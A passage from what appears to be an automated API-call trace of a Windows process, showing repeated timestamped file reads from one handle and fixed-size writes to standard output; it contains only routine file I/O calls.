WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.249] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.249] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.249] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.249] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] GetFileType (hFile=0x4c) returned 0x1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] GetFileType (hFile=0x4c) returned 0x1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] GetFileType (hFile=0x4c) returned 0x1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.250] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.250] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.251] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.251] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.252] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.252] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.253] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.253] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.254] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.254] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.255] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.255] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.256] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.256] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType 